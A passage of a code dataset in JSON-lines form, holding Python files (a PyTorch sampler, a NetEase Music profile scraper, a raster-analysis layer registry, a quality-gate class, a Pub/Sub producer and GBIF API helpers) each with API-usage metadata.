"line_number": 122, "usage_type": "call"}, {"api_name": "utilities.threshold", "line_number": 127, "usage_type": "call"}, {"api_name": "utilities.create_graph", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 188, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 194, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 198, "usage_type": "attribute"}, {"api_name": "numpy.integer", "line_number": 199, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 201, "usage_type": "attribute"}, {"api_name": "scipy.linalg.lstsq", "line_number": 208, "usage_type": "call"}, {"api_name": "scipy.linalg", "line_number": 208, "usage_type": "name"}, {"api_name": "scipy.linalg.lstsq", "line_number": 209, "usage_type": "call"}, {"api_name": "scipy.linalg", "line_number": 209, "usage_type": "name"}, {"api_name": "scipy.stats.pearsonr", "line_number": 214, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 214, "usage_type": "name"}]} +{"seq_id": "75915223", "text": "import torch\r\nfrom torch.utils.data.sampler import Sampler\r\nimport numpy as np\r\nimport logging\r\n\r\ndef create_logger(name, log_file, level=logging.INFO):\r\n l = logging.getLogger(name)\r\n formatter = logging.Formatter('[%(asctime)s][%(filename)15s][line:%(lineno)4d][%(levelname)8s] %(message)s')\r\n fh = logging.FileHandler(log_file)\r\n fh.setFormatter(formatter)\r\n sh = logging.StreamHandler()\r\n sh.setFormatter(formatter)\r\n l.setLevel(level)\r\n l.addHandler(fh)\r\n l.addHandler(sh)\r\n return l\r\n\r\nclass DataSampler(Sampler):\r\n \"\"\"Sampler that restricts data loading to a subset of the dataset.\r\n\r\n .. note::\r\n Dataset is assumed to be of constant size.\r\n\r\n Arguments:\r\n dataset: Dataset used for sampling.\r\n \"\"\"\r\n\r\n def __init__(self, dataset, round_up=True):\r\n self.dataset = dataset\r\n self.round_up = round_up\r\n self.epoch = 0\r\n \r\n self.num_samples = len(self.dataset)\r\n\r\n self.total_size = len(self.dataset)\r\n\r\n def __iter__(self):\r\n # deterministically shuffle based on epoch\r\n g = torch.Generator()\r\n g.manual_seed(self.epoch)\r\n indices = list(torch.randperm(len(self.dataset), generator=g))\r\n\r\n # add extra samples to make it evenly divisible\r\n if self.round_up:\r\n indices += indices[:(self.total_size - len(indices))]\r\n assert len(indices) == self.total_size\r\n\r\n return iter(indices)\r\n\r\n def __len__(self):\r\n return self.num_samples\r\n\r\n def set_epoch(self, epoch):\r\n self.epoch = epoch\r\n\r\nclass GivenIterationSampler(Sampler):\r\n def __init__(self, dataset, total_iter, batch_size, last_iter=-1):\r\n self.dataset = dataset\r\n self.total_iter = total_iter\r\n self.batch_size = batch_size\r\n self.world_size = 1\r\n self.rank = 0\r\n self.last_iter = last_iter\r\n\r\n self.total_size = self.total_iter*self.batch_size\r\n\r\n self.indices = self.gen_new_list()\r\n self.call = 0\r\n\r\n def __iter__(self):\r\n if self.call == 0:\r\n self.call = 1\r\n return iter(self.indices[(self.last_iter+1)*self.batch_size:])\r\n else:\r\n raise RuntimeError(\"this sampler is not designed to be called more than once!!\")\r\n\r\n def gen_new_list(self):\r\n\r\n # each process shuffle all list with same seed, and pick one piece according to rank\r\n np.random.seed(0)\r\n\r\n all_size = self.total_size * self.world_size\r\n indices = np.arange(len(self.dataset))\r\n indices = indices[:all_size]\r\n num_repeat = (all_size-1) // indices.shape[0] + 1\r\n indices = np.tile(indices, num_repeat)\r\n indices = indices[:all_size]\r\n\r\n np.random.shuffle(indices)\r\n beg = self.total_size * self.rank\r\n indices = indices[beg:beg+self.total_size]\r\n\r\n assert len(indices) == self.total_size\r\n\r\n return indices\r\n\r\n def __len__(self):\r\n # note here we do not take last iter into consideration, since __len__\r\n # should only be used for displaying, the correct remaining size is\r\n # handled by dataloader\r\n #return self.total_size - (self.last_iter+1)*self.batch_size\r\n return self.total_size", "sub_path": "util/data_loader.py", "file_name": "data_loader.py", "file_ext": "py", "file_size_in_byte": 3252, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.INFO", "line_number": 6, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 9, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.utils.data.sampler.Sampler", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.Generator", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.randperm", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.utils.data.sampler.Sampler", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.random.seed", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 80, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 89, "usage_type": "attribute"}]} +{"seq_id": "90687184", "text": "import requests\nfrom lxml import etree\nimport re\nimport datetime\nimport time\n\nurl='https://music.163.com/user/home?id=514172523'\nheaders={\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'\n}\n\n\ndef get_username_sign(result):\n sign=re.split('[。,;:]',result[0])[0]\n username=re.sub('[的最近常听]','',re.split('[、]',re.split('[。,;:]',result[0])[1])[0])\n return username,sign\n\n\ndef write_if_not_exist(username,sign):\n '''判断是否相同,如果有不同的就写入'''\n with open('163music.txt','r',encoding='utf-8') as f:\n for line in f:\n result=username+'\\t'+sign+'\\n'\n if result in line:\n print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')+'已经存在\\t'+result)\n f.close()\n return\n else:\n with open('163music.txt','a',encoding='utf-8') as f:\n f.write(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')+'\\t'+username+'\\t'+sign+'\\n')\n f.close()\n print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')+'写入成功\\t'+result)\n\nwhile 1:\n r=requests.get(url,headers=headers)\n html=etree.HTML(r.text)\n result=html.xpath('//meta[@name=\"description\"]/@content')\n username,sign=get_username_sign(result)\n write_if_not_exist(username,sign)\n time.sleep(60)\n \n", "sub_path": "pycrawler/163music.py", "file_name": "163music.py", "file_ext": "py", "file_size_in_byte": 1463, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "re.split", "line_number": 14, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 15, "usage_type": "call"}, {"api_name": "re.split", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 25, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 35, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 36, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 36, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "324311191", "text": "from collections import defaultdict\nfrom datetime import date, datetime, timedelta\nfrom typing import Any, Dict, List\n\nfrom pandas import Series\n\nfrom raster_analysis.globals import CO2_FACTOR\nfrom raster_analysis.layer import Grid, Layer\n\n\ndef date_conf_decoder(layer: str, s: Series) -> Dict[str, Series]:\n days_since_2015 = s % 10000\n ordinal_dates = days_since_2015 + date(2014, 12, 31).toordinal()\n str_dates = ordinal_dates.apply(\n lambda val: date.fromordinal(val).strftime(\"%Y-%m-%d\")\n )\n\n return {layer: str_dates}\n\n\ndef date_conf_encoder(val: Any) -> List[Any]:\n as_date = datetime.strptime(val, \"%Y-%m-%d\")\n days_since_2015 = as_date.toordinal() - date(2014, 12, 31).toordinal()\n return [days_since_2015]\n\n\ndef date_conf_isoweek_decoder(layer: str, s: Series):\n days_since_2015 = s % 10000\n ordinal_dates = days_since_2015 + date(2014, 12, 31).toordinal()\n dates = [date.fromordinal(ordinal) for ordinal in ordinal_dates]\n iso_week_dates = [(d - timedelta(days=d.isoweekday() - 1)) for d in dates]\n\n iso_weeks = list(map(lambda val: val.isocalendar()[1], iso_week_dates))\n years = list(map(lambda val: val.isocalendar()[0], iso_week_dates))\n\n base_name = layer.split(\"__\")[0]\n\n if base_name == \"umd_glad_landsat_alerts\":\n base_name = \"umd_glad_alerts\"\n\n return {f\"{base_name}__isoweek\": iso_weeks, f\"{base_name}__year\": years}\n\n\ndef year_decoder(layer, s):\n return {layer: s + 2000}\n\n\ndef year_encoder(val):\n return [val - 2000]\n\n\ndef co2_decoder(layer, s):\n return {\"whrc_aboveground_co2_emissions__Mg\": s * CO2_FACTOR}\n\n\n# TODO refactor this when you start consuming from data API, using a dict here gets messy\nLAYERS: Dict[str, Layer] = defaultdict(\n lambda: Layer(layer=\"count\", version=\"virtual\"),\n {\n \"area__ha\": Layer(layer=\"area__ha\", version=\"virtual\"),\n \"alert__count\": Layer(layer=\"alert__count\", version=\"virtual\"),\n \"latitude\": Layer(layer=\"latitude\", version=\"virtual\"),\n \"longitude\": Layer(layer=\"longitude\", version=\"virtual\"),\n \"umd_tree_cover_loss__year\": Layer(\n layer=\"umd_tree_cover_loss__year\",\n version=\"v1.8\",\n decoder=year_decoder,\n encoder=year_encoder,\n ),\n # deprecated\n \"umd_glad_alerts__date\": Layer(\n layer=\"umd_glad_landsat_alerts__date\",\n version=\"v1.7\",\n decoder=date_conf_decoder,\n encoder=date_conf_encoder,\n ),\n # deprecated\n \"umd_glad_alerts__isoweek\": Layer(\n layer=\"umd_glad_landsat_alerts__date\",\n version=\"v1.7\",\n decoder=date_conf_isoweek_decoder,\n ),\n \"umd_glad_landsat_alerts__date\": Layer(\n layer=\"umd_glad_landsat_alerts__date\",\n version=\"v1.7\",\n decoder=date_conf_decoder,\n encoder=date_conf_encoder,\n is_conf_encoded=True,\n ),\n \"umd_glad_landsat_alerts__isoweek\": Layer(\n layer=\"umd_glad_landsat_alerts__date\",\n version=\"v1.7\",\n decoder=date_conf_isoweek_decoder,\n ),\n \"umd_glad_landsat_alerts__confidence\": Layer.from_encoding(\n \"umd_glad_landsat_alerts__date\",\n \"v1.7\",\n encoding={2: \"\", 3: \"high\"},\n alias=\"umd_glad_landsat_alerts__confidence\",\n ),\n \"gfw_radd_alerts__date\": Layer(\n layer=\"gfw_radd_alerts__date_conf\",\n alias=\"gfw_radd_alerts__date\",\n version=\"v20210328\",\n decoder=date_conf_decoder,\n encoder=date_conf_encoder,\n grid=Grid(degrees=10, pixels=100000, tile_degrees=0.5),\n ),\n \"gfw_radd_alerts__confidence\": Layer.from_encoding(\n \"gfw_radd_alerts__date_conf\",\n \"v20210328\",\n encoding={2: \"\", 3: \"high\"},\n grid=Grid(degrees=10, pixels=100000, tile_degrees=0.5),\n alias=\"gfw_radd_alerts__confidence\",\n ),\n \"umd_glad_sentinel2_alerts__date\": Layer(\n layer=\"umd_glad_sentinel2_alerts__date_conf\",\n alias=\"umd_glad_sentinel2_alerts__date\",\n version=\"v20210406\",\n decoder=date_conf_decoder,\n encoder=date_conf_encoder,\n grid=Grid(degrees=10, pixels=100000, tile_degrees=0.5),\n ),\n \"umd_glad_sentinel2_alerts__confidence\": Layer.from_encoding(\n \"umd_glad_sentinel2_alerts__date_conf\",\n \"v20210406\",\n encoding={2: \"\", 3: \"high\"},\n grid=Grid(degrees=10, pixels=100000, tile_degrees=0.5),\n alias=\"umd_glad_sentinel2_alerts__confidence\",\n ),\n \"is__umd_regional_primary_forest_2001\": Layer.boolean(\n \"is__umd_regional_primary_forest_2001\", \"v201901\"\n ),\n \"umd_tree_cover_density_2000__threshold\": Layer.from_encoding(\n \"umd_tree_cover_density_2000__threshold\",\n \"v1.6\",\n encoding={1: 10, 2: 15, 3: 20, 4: 25, 5: 30, 6: 50, 7: 75},\n ),\n \"umd_tree_cover_density_2010__threshold\": Layer.from_encoding(\n \"umd_tree_cover_density_2010__threshold\",\n \"v1.6\",\n encoding={1: 10, 2: 15, 3: 20, 4: 25, 5: 30, 6: 50, 7: 75},\n ),\n \"is__umd_tree_cover_gain\": Layer.boolean(\"is__umd_tree_cover_gain\", \"v1.6\"),\n \"whrc_aboveground_biomass_stock_2000__Mg_ha-1\": Layer(\n layer=\"whrc_aboveground_biomass_stock_2000__Mg_ha-1\",\n version=\"v4\",\n is_area_density=True,\n ),\n \"whrc_aboveground_co2_emissions__Mg\": Layer(\n layer=\"whrc_aboveground_biomass_stock_2000__Mg_ha-1\",\n version=\"v4\",\n is_area_density=True,\n decoder=co2_decoder,\n ),\n \"tsc_tree_cover_loss_drivers__type\": Layer.from_encoding(\n \"tsc_tree_cover_loss_drivers__type\",\n \"v2020\",\n encoding=defaultdict(\n lambda: \"Unknown\",\n {\n 1: \"Commodity driven deforestation\",\n 2: \"Shifting agriculture\",\n 3: \"Forestry\",\n 4: \"Wildfire\",\n 5: \"Urbanization\",\n },\n ),\n ),\n \"gfw_plantations__type\": Layer.from_encoding(\n \"gfw_plantations__type\",\n \"v1.3\",\n encoding={\n 1: \"Fruit\",\n 2: \"Fruit Mix\",\n 3: \"Oil Palm \",\n 4: \"Oil Palm Mix\",\n 5: \"Other\",\n 6: \"Rubber\",\n 7: \"Rubber Mix\",\n 8: \"Unknown\",\n 9: \"Unknown Mix\",\n 10: \"Wood fiber / Timber\",\n 11: \"Wood fiber / Timber Mix\",\n },\n ),\n \"wdpa_protected_areas__iucn_cat\": Layer.from_encoding(\n \"wdpa_protected_areas__iucn_cat\",\n \"v202007\",\n encoding={1: \"Category Ia/b or II\", 2: \"Other Category\"},\n ),\n \"esa_land_cover_2015__class\": Layer.from_encoding(\n \"esa_land_cover_2015__class\",\n \"v20160111\",\n encoding=defaultdict(\n lambda: \"Unknown\",\n {\n 10: \"Agriculture\",\n 11: \"Agriculture\",\n 12: \"Agriculture\",\n 20: \"Agriculture\",\n 30: \"Agriculture\",\n 40: \"Agriculture\",\n 50: \"Forest\",\n 60: \"Forest\",\n 61: \"Forest\",\n 62: \"Forest\",\n 70: \"Forest\",\n 72: \"Forest\",\n 80: \"Forest\",\n 81: \"Forest\",\n 82: \"Forest\",\n 90: \"Forest\",\n 100: \"Forest\",\n 160: \"Forest\",\n 170: \"Forest\",\n 110: \"Grassland\",\n 130: \"Grassland\",\n 180: \"Wetland\",\n 190: \"Settlement\",\n 120: \"Shrubland\",\n 121: \"Shrubland\",\n 122: \"Shrubland\",\n 140: \"Sparse vegetation\",\n 150: \"Sparse vegetation\",\n 151: \"Sparse vegetation\",\n 152: \"Sparse vegetation\",\n 153: \"Sparse vegetation\",\n 200: \"Bare\",\n 201: \"Bare\",\n 202: \"Bare\",\n 210: \"Water\",\n 220: \"Permanent snow and ice\",\n },\n ),\n ),\n \"is__birdlife_alliance_for_zero_extinction_sites\": Layer.boolean(\n \"is__birdlife_alliance_for_zero_extinction_sites\", \"v20200725\"\n ),\n \"is__gmw_mangroves_1996\": Layer.boolean(\"is__gmw_mangroves_1996\", \"v20180701\"),\n \"is__gmw_mangroves_2016\": Layer.boolean(\"is__gmw_mangroves_2016\", \"v20180701\"),\n \"ifl_intact_forest_landscapes__year\": Layer(\n layer=\"ifl_intact_forest_landscapes__year\", version=\"v20180628\"\n ),\n \"is__gfw_tiger_landscapes\": Layer.boolean(\n \"is__gfw_tiger_landscapes\", \"v201904\"\n ),\n \"is__landmark_land_rights\": Layer.boolean(\n \"is__landmark_land_rights\", \"v20191111\"\n ),\n \"is__gfw_land_rights\": Layer.boolean(\"is__gfw_land_rights\", \"v2016\"),\n \"is__birdlife_key_biodiversity_areas\": Layer.boolean(\n \"is__birdlife_key_biodiversity_areas\", \"v20191211\"\n ),\n \"is__gfw_mining\": Layer.boolean(\"is__gfw_mining\", \"v20190205\"),\n \"is__gfw_peatlands\": Layer.boolean(\"is__gfw_peatlands\", \"v20190103\"),\n \"is__gfw_oil_palm\": Layer.boolean(\"is__gfw_oil_palm\", \"v20191031\"),\n \"is__gfw_wood_fiber\": Layer.boolean(\"is__gfw_wood_fiber\", \"v20200725\"),\n \"is__gfw_resource_rights\": Layer.boolean(\"is__gfw_resource_rights\", \"v2015\"),\n \"is__gfw_managed_forests\": Layer.boolean(\n \"is__gfw_managed_forests\", \"v20190103\"\n ),\n \"rspo_oil_palm__certification_status\": Layer(\n layer=\"rspo_oil_palm__certification_status\",\n version=\"v20200114\",\n encoding={1: \"Certified\", 2: \"Unknown\", 3: \"Not certified\"},\n ),\n \"idn_forest_area__type\": Layer.from_encoding(\n \"idn_forest_area__type\",\n \"v201709\",\n encoding={\n 1001: \"Protected Forest\",\n 1003: \"Production Forest\",\n 1004: \"Limited Production Forest\",\n 1005: \"Converted Production Forest\",\n 1007: \"Other Utilization Area\",\n 1: \"Sanctuary Reserves/Nature Conservation Area\",\n 1002: \"Sanctuary Reserves/Nature Conservation Area\",\n 10021: \"Sanctuary Reserves/Nature Conservation Area\",\n 10022: \"Sanctuary Reserves/Nature Conservation Area\",\n 10023: \"Sanctuary Reserves/Nature Conservation Area\",\n 10024: \"Sanctuary Reserves/Nature Conservation Area\",\n 10025: \"Sanctuary Reserves/Nature Conservation Area\",\n 10026: \"Sanctuary Reserves/Nature Conservation Area\",\n 100201: \"Marine Protected Areas\",\n 100211: \"Marine Protected Areas\",\n 100221: \"Marine Protected Areas\",\n 100201: \"Marine Protected Areas\",\n 100201: \"Marine Protected Areas\",\n },\n ),\n \"per_forest_concession__type\": Layer.from_encoding(\n \"per_forest_concession__type\",\n \"v20161001\",\n encoding={\n 1: \"Conservation\",\n 2: \"Ecotourism\",\n 3: \"Nontimber Forest Products (Nuts)\",\n 4: \"Nontimber Forest Products (Shiringa)\",\n 5: \"Reforestation\",\n 6: \"Timber Concession\",\n 7: \"Wildlife\",\n },\n ),\n \"bra_biome__name\": Layer.from_encoding(\n \"bra_biome__name\",\n \"v20150601\",\n encoding={\n 1: \"Caatinga\",\n 2: \"Cerrado\",\n 3: \"Pantanal\",\n 4: \"Pampa\",\n 5: \"Amazônia\",\n 6: \"Mata Atlântica\",\n },\n ),\n },\n)\n", "sub_path": "raster_analysis/data_lake.py", "file_name": "data_lake.py", "file_ext": "py", "file_size_in_byte": 12277, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.Series", "line_number": 11, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.date.fromordinal", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 21, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 23, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 21, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 27, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.date.fromordinal", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 30, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 31, "usage_type": "call"}, {"api_name": "raster_analysis.globals.CO2_FACTOR", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 57, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 57, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 57, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 58, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 60, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 61, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 62, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 63, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 64, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 71, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 78, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 83, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 90, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 95, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 95, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 101, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Grid", "line_number": 107, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 109, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 109, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Grid", "line_number": 113, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 116, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Grid", "line_number": 122, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 124, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 124, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Grid", "line_number": 128, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 131, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 131, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 134, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 134, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 139, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 139, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 144, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 144, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 145, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 150, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 156, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 156, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 159, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 170, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 170, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 187, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 187, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 192, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 192, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 195, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 237, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 237, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 240, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 240, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 241, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 241, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 242, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 245, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 245, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 248, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 248, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 251, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 251, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 252, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 252, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 255, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 255, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 256, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 256, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 257, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 257, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 258, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 258, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 259, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 259, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.boolean", "line_number": 260, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 260, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 263, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 268, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 268, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 292, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 292, "usage_type": "name"}, {"api_name": "raster_analysis.layer.Layer.from_encoding", "line_number": 305, "usage_type": "call"}, {"api_name": "raster_analysis.layer.Layer", "line_number": 305, "usage_type": "name"}]} +{"seq_id": "171847041", "text": "from collections import Counter\n\nfrom finding.finding import Severity\n\n\nclass QualityGate(Counter):\n def __init__(self, *args, **kwargs):\n super(QualityGate, self).__init__(*args, **kwargs)\n\n @classmethod\n def parse(cls, value, sep=\"/\", keys=None, ignore=False):\n if not value:\n raise ValueError(\"Input is {}\".format(\"none\" if value is None else \"empty\"))\n\n if not sep:\n raise ValueError(\"Separator is {}\".format(\"none\" if sep is None else \"empty\"))\n\n if keys is None:\n keys = [x.name() for x in Severity if x > Severity.INFO]\n keys.reverse()\n\n args = value.split(sep=sep, maxsplit=len(keys))\n\n if not ignore and len(args) != len(keys):\n raise ValueError(\"Number of values does not match to number of keys: {} (expected: {})\".format(len(keys), len(args)))\n\n tmp = dict(zip(keys, [int(x) for x in args]))\n\n return QualityGate(tmp)\n\n def test(self, **kwargs):\n if kwargs is None:\n return dict()\n\n for key, value in kwargs.items():\n if key in self and self[key] > kwargs[key]:\n yield key, value\n", "sub_path": "utils/quality.py", "file_name": "quality.py", "file_ext": "py", "file_size_in_byte": 1166, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "collections.Counter", "line_number": 6, "usage_type": "name"}, {"api_name": "finding.finding.Severity", "line_number": 19, "usage_type": "name"}, {"api_name": "finding.finding.Severity.INFO", "line_number": 19, "usage_type": "attribute"}]} +{"seq_id": "209265906", "text": "from google.cloud import pubsub_v1\n\npublisher = pubsub_v1.PublisherClient()\ntopic_path = publisher.topic_path(\"babylon-258211\",\"babylon-topic\")\n\nf = open(\"babylon.json\", \"r\")\nfor appointment in f:\n\tprint(appointment)\n\tfuture = publisher.publish(topic_path, data=appointment.encode('utf-8'))\n\tprint(future.result())\nf.close()\n\n", "sub_path": "producer/producer.py", "file_name": "producer.py", "file_ext": "py", "file_size_in_byte": 326, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "google.cloud.pubsub_v1.PublisherClient", "line_number": 3, "usage_type": "call"}, {"api_name": "google.cloud.pubsub_v1", "line_number": 3, "usage_type": "name"}]} +{"seq_id": "92726024", "text": "#!/usr/bin/python3\nimport requests\nfrom leia_api.constants import GBIF_API_SUGGEST_URL, GBIF_API_DISTRIBUTIONS_PREFIX_URL, GBIF_API_DISTRIBUTIONS_SUFFIX_URL\n\n\ndef get_gbif_taxonomy(name: str):\n payload = {'q': name, 'limit': 1}\n gbif_request = requests.get(url=GBIF_API_SUGGEST_URL, params=payload)\n gbif_response = gbif_request.json()\n return gbif_response\n\n\ndef get_gbif_distributions(key: str):\n gbif_request = requests.get(\n url=GBIF_API_DISTRIBUTIONS_PREFIX_URL + str(key) + GBIF_API_DISTRIBUTIONS_SUFFIX_URL)\n gbif_response = gbif_request.json()\n return gbif_response\n", "sub_path": "backend/leia_api/helpers/gbif.py", "file_name": "gbif.py", "file_ext": "py", "file_size_in_byte": 602, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": 